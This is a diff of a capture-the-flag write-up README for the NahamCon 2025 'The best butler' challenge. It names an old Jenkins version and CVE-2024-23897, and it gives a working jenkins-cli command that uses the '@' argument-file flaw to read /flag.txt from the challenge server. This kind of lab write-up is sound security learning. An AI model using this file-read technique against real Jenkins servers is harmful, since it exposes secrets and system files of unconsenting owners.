PrathamGupta06/CTF-Writeups/nahamcon2025/DevOps/The best butler/README.md

 We can't really do much since it's unauthenticated.
 The jenkins version is very old: **Jenkins 2.332.2** After some research found out a CVE: CVE-2024-23897 which allows for Arbitrary File read.
-For this we need access to the jenkins-cli.jar.
+For this we need to first download the `jenkins-cli.jar`.

 Ran the following command: `java -jar jenkins-cli.jar -s http://challenge.nahamcon.com:port/ -webSocket help @/flag.txt`